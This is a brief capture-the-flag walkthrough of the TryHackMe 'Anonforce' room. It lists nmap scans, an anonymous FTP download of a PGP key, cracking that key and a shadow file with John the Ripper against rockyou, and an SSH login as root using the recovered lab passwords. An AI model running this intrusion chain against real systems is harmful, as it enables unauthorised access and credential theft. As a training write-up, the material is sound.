Anonforce

Room Link: https://tryhackme.com/room/bsidesgtanonforce

Kali

nmap -A $VICTIM

No other ports found

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

Anonymous login is enabled. There was a folder called notread with a pgp file.

Kali

ftp $VICTIM
> cd notread
> mget *

I used john to crack the private.asc file

Kali

/opt/john/gpg2john private.asc > pgp.hash
john pgp.hash --wordlist=/usr/share/wordlists/rockyou.txt

Kali

gpg --import private.asc 
Password: xbox360

I was able to decrypt backup.pgp which had the shadow file

Kali

gpg --decrypt backup.pgp 
Password: xbox360

I copied the above shadow file and tried cracking this file which gave me roots password.

Kali

john pass.txt  --wordlist=/usr/share/wordlists/rockyou.txt

Kali

ssh root@$VICTIM
Password: hikari

Last updated 1 year ago